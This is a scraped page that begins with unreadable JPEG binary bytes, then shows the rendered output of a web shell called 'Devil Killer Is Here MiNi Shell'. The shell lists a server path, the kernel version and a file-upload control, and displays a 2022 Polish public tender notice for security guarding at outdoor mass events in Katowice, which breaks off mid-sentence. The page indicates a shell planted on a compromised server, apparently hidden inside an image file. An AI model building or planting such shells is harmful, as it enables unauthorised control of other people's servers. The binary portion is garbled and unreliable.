JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220513/0015687401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony fizycznej masowych imprez zewnętrznych organizowanych w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Katowice Miasto Ogrodów Instytucja Kultury im. Krystyny Bochenek</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Specjalista ds. zamówień publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 385469690</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Sejmu Śląskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-032</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@miasto-ogrodow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.miasto-ogrodow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony fizycznej masowych imprez zewnętrznych organizowanych w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97e6dae0-d278-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00156874</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039859/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa ochrony fizycznej masowych imprez zewnętrznych organizowanych w Katowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Komunikacja, w tym składanie<br/>ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a<br/>wykonawcą, z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków<br/>komunikacji elektronicznej:<br/>miniPortalu – https://miniportal.uzp.gov.pl,<br/>ePUAP – https://eupap.gov.pl<br/>oraz poczty elektronicznej na adres mailowy: zamowienia@miasto-ogrodow.eu<br/>(z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Zgodnie z art. 63 ustawy Pzp w postępowaniu o udzielenie zamówienia, komunikacja między<br/>zamawiającym a wykonawcami, w szczególności składanie ofert oraz oświadczeń, o których mowa w<br/>art. 125 ust. 1 ustawy Pzp sporządza się pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2) Zgodnie z art. 7 pkt 23 ustawy Pzp poprzez środki komunikacji elektronicznej należy rozumieć środki<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną.<br/>3) W postępowaniu o udzielenie zamówienia publicznego komunikacja między zamawiającym<br/>a wykonawcami, w szczególności składanie oświadczeń, wniosków (innych niż wskazane w pkt 1),<br/>zawiadomień oraz przekazywanie informacji odbywa się za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP oraz udostępnionego przez miniPortal https://miniportal.uzp.gov.pl (formularz<br/>do komunikacji) oraz poczty elektronicznej zamowienia@miasto-ogrodow.eu (z wyłączeniem składania<br/>ofert).<br/>4) Korzystanie z miniPortalu przez wykonawców jest bezpłatne i wymaga założenia konta na ePUAP.<br/>5) Wykonawca zamierzając wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP, wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza komunikacji.<br/>6) Zamawiający, zgodnie z §3 ust. 3 Rozporządzenia o elektronizacji określa:<br/>a) W Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP niezbędne wymagania<br/>techniczne i organizacyjne wysłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu – dostępne pod adresem<br/>https://miniportal.uzp.gov.pl oraz https://www.gov.pl/web/gov/warunki-korzystania.<br/>b) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB (dot. MiniPortalu oraz<br/>ePUAP),<br/>c) Informacje na temat kodowanie i czasu odbioru danych, tj.:<br/>- Plik przesłany przez wykonawcę za pośrednictwem dedykowanych formularzy widnieje jako<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu pliku przez<br/>zamawiającego,<br/>- Oznaczenie czasu odbioru danych przez miniPortal – wszelkie operacje opierają się o czas serwera i<br/>dane zapisywane są z dokładnością co do setnej sekundy.<br/>7) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>8) Identyfikator postępowania dla niniejszego zamówienia publicznego dostępny jest na liście<br/>wszystkich postępowań na miniPortalu oraz zawarty jest w załączniku nr 10 do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest KMO – Instytucja<br/>Kultury im. Krystyny Bochenek, plac Sejmu Śląskiego 2, 40-032 Katowice,; Administrator prowadzi<br/>operacje przetwarzania danych Kontakt z inspektorem ochrony danych: p Sejmu Śląskiego 2, 40-032<br/>Katowice; iod@miasto-ogrodow.eu.<br/>dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>przedmiotowego postępowania zgodnie z art. 18 oraz 74 ustawy Pzp, a także art. 6 ustawy o dostępie<br/>do informacji publicznej.<br/>Podanie przez danych osobowych jest niezbędne do realizacji celu związanego z udzieleniem zam<br/>publ; w przypadku niepodania danych niemożliwa będzie realizacja w/w celu.<br/>Wykonawca jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych<br/>wymaganych przez RODO:<br/>obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu<br/>w treści oferty lub dokumentów składanych na żądanie Zamawiającego;<br/>obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane<br/>wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w<br/>treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w<br/>postępowaniu, wykonawca składa oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych<br/>Zamawiajacy<br/>udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa w ustawie Pzp, do upływu terminu na ich wniesienie,<br/>Udostępnienie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o<br/>udzielenie zamówienia.<br/>W przypadku korzystania przez osobę, której dane osobowe są przetwarzane ,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO<br/>zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia,<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16<br/>RODO nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania,<br/>W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetw. danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki o których mowa<br/>w art. 18 ust. 2 ,<br/>Prawo do wniesienia skargi do organu nadzorczego posiada każdy, gdy uzna że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO na adres Prezesa UODO, ul. Stawki 2, 00-193 Warszawa.<br/>dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>dane osobowe będą przechowywane przez 4 lata, a następnie zgodnie z powszechnie obowiązującymi<br/>przepisami o archiwizacji dokumentów.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-1/TP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest usługa ochrony fizycznej podczas zewnętrznych imprez masowych organizowanych przez Katowice Miasto Ogrodów – Instytucję Kultury im. Krystyny Bochenek, a także ochrony prac montażowych, demontażowych i infrastruktury wraz z zapewnieniem obsługi medycznej oraz dostarczeniem wygrodzeń tymczasowych na terenie imprezy.<br/>2)	Termin realizacji: Zamówienie będzie realizowane w następujących terminach: 16.06-21.06.2022 r. oraz 05.09-12.09.2022 r., według harmonogramu, który zawiera opis przedmiotu zamówienia (załącznik nr 1 do SWZ). <br/>3)	Miejsce realizacji zamówienia: miasto Katowice (Strefa Kultury, Rynek, Lotnisko Muchowiec). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121000-3 - Usługi medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert niepodlegających odrzuceniu przy zastosowaniu następujących kryteriów:<br/>	Za ofertę najkorzystniejszą w danej części postępowania zostanie uznana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny, a więc zawierająca najkorzystniejszy bilans punktów w następujących kryteriach:<br/>Łączna cena brutto oferty – 60%<br/>Doświadczenie koordynatora ochrony – 40% <br/>	Opis stosowanych kryteriów oraz sposób oceny ofert:<br/>	Cena - oznacza cenę łączną brutto za wykonanie całości przedmiotu zamówienia zgodnie z dokumentami zamówienia obliczona jako iloczyn poszczególnych cen jednostkowych. Cena wskazana w formularzu oferty oceniana będzie w następujący sposób:<br/>∑C pkt=(Cena najtańszej oferty x 60 pkt )/(Cena badanej oferty) <br/>	∑C pkt – suma punktów za kryterium „cena”<br/>	Zamawiający w ramach tego kryterium przyzna maksymalnie 60 pkt.<br/>	Doświadczenie kierownika bezpieczeństwa: <br/>	Wykonawca otrzyma dodatkowe punkty w tym kryterium oceny ofert, jeśli do realizacji zamówienia skieruje jedną osobę pełniącą funkcję kierownika bezpieczeństwa, posiadającą wpis na listę kwalifikowanych pracowników ochrony fizycznej w rozumieniu ustawy o ochronie osób i mienia, a także doświadczenie w pełnieniu funkcji kierownika bezpieczeństwa podczas imprez masowych. <br/>	Zamawiający dokona oceny tego kryterium na podstawie złożonej przez wykonawcę w pkt 2 ppkt 8) Formularza oferty (załącznik 2 do SWZ) informacji dotyczącej kwalifikacji oraz doświadczenia skierowanych do realizacji zamówienia osoby na stanowisko kierownika bezpieczeństwa: <br/>	doświadczenie w pełnieniu funkcji kierownika bezpieczeństwa podczas czterech (4) imprez masowych – 10 pkt,<br/>	doświadczenie w pełnieniu funkcji kierownika bezpieczeństwa podczas pięciu (5) imprez masowych – 20 pkt,<br/>	doświadczenie w pełnieniu funkcji kierownika bezpieczeństwa podczas sześciu (6) imprez masowych – 30 pkt,<br/>	doświadczenie w pełnieniu funkcji kierownika bezpieczeństwa podczas siedmiu (7)<br/>i więcej imprez masowych – 40 pkt.<br/>W tym kryterium wykonawca może otrzymać maksymalnie 40 pkt. <br/>	Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy niepodlegającego wykluczeniu, która nie podlega odrzuceniu oraz która uzyska największą liczbę zsumowanych punktów w ramach ustalonych ww. kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z przepisem art. 112 ust. 1 ustawy Pzp, Zamawiający określa następujące warunki udziału w postępowaniu:<br/>1)	Warunek dotyczący uprawnień do prowadzenia określonej działalności: <br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż posiada aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony fizycznej osób i mienia realizowanej w formie bezpośredniej ochrony fizycznej w rozumieniu przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj.: Dz. U. z 2020, poz. 839 ze zm.).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga, aby czynności do wykonywania których niezbędne jest posiadanie koncesji, wykonywał ten wykonawca, który posiada koncesję.<br/>2)	Warunek dotyczący zdolności technicznej lub zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:<br/>a)	posiada minimalne warunki dotyczące doświadczenia, co oznacza iż w okresie ostatnich trzech lat przed upływem terminu składania ofert lat wykonał należycie co najmniej (pięć) 5 usług polegających na ochronie osób i mienia imprez masowych, o zgłoszonej liczbie uczestników każdej imprezy co najmniej 10 000 osób, o charakterze plenerowym, <br/>tj. organizowane w terenie otwartym (odbywające się̨ nie w budynkach, pomieszczeniach zamkniętych czy na stadionach), z których wszystkie muszą być imprezami masowymi <br/><br/>b)	o charakterze artystyczno-rozrywkowym. Każda z usług musi być wykonana co najmniej na kwotę 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych). <br/><br/>UWAGA: Poprzez imprezę masową Zamawiający rozumie imprezę, która posiada odrębne stosowne zezwolenie. W przypadku imprez trwających dłużej niż jeden dzień, lecz posiadających jedno zezwolenie lub organizowanych cyklicznie w ciągu jednego roku na podstawie tego samego zezwolenia, imprezy te będą traktowane jako jedna impreza. Poprzez należyte wykonanie ww. zamówień, Zamawiający rozumie ich odbiór przez zamawiających bez zastrzeżeń. <br/><br/>W przypadku, gdy w złożonych dokumentach lub oświadczeniach podane będą kwoty wyrażone w walucie innej niż PLN, w celu dokonania oceny spełniania warunków udziału <br/>w postępowaniu, Zamawiający zastosuje przeliczenie tej waluty wg średniego kursu Narodowego Banku Polskiego (tabela A kursów średnich walut obcych) na dzień zamieszczenia ogłoszenia o zamówieniu. Średnie kursy walut dostępne są na stronie internetowej pod adresem http://www.nbp.pl.<br/><br/>c)	skieruje do realizacji niniejszego zamówienia Kierownika ds. bezpieczeństwa – 1 (jedną) osobę, która podczas całego okresu realizacji zamówienia będzie odpowiedzialna za bezpośredni kontakt z Zamawiającym i jego przedstawicielami. Kierownik ds. bezpieczeństwa:<br/>-	posiada uprawnienia do pełnienia funkcji kierownika do spraw bezpieczeństwa w rozumieniu ustawy z dnia 20 marca 2009 roku o bezpieczeństwie imprez masowych (t.j. Dz. U. z 2019 r., poz. 2171 z późn. zm.),<br/>-	posiada wpis na listę̨ kwalifikowanych pracowników ochrony fizycznej,<br/>-	posiada doświadczenie w zakresie pełnienia funkcji kierownika do spraw bezpieczeństwa przy co najmniej 3 (trzech) masowych imprezach organizowanych w terenie otwartym (odbywające się̨ nie w budynkach, pomieszczeniach zamkniętych czy na stadionach), w których zgłoszony był udział co najmniej 10 000 osób w każdej imprezie,<br/>-	jest zatrudniony przez Wykonawcę̨ bądź współpracuje z Wykonawcą w innej formie (np. umowa cywilno-prawna), co najmniej 12 miesięcy przed upływem terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z dyspozycją art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, na potwierdzenie spełniania warunków udziału w postępowaniu, aktualnych na dzień ich złożenia, w postaci:<br/>1)	Aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony fizycznej osób i mienia realizowanej w formie bezpośredniej ochrony fizycznej.<br/>Dokumenty składane w celu potwierdzenia spełniania warunku udziału w postępowaniu, o którym mowa w rozdziale III pkt 4 ppkt 1) SWZ.<br/>Wymagana forma i moment złożenia:<br/>oryginał w formie elektronicznej, w postaci elektronicznej z podpisem zaufanym lub osobistym albo kopia w postaci cyfrowego odwzorowania dokumentu papierowego, poświadczona za zgodność z oryginałem przez wykonawcę podpisem kwalifikowanym, zaufanym lub osobistym lub przez notariusza podpisem kwalifikowanym. Dokument składany na wezwanie Zamawiającego.<br/>2)	Wykazu osób, które będą uczestniczyć w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 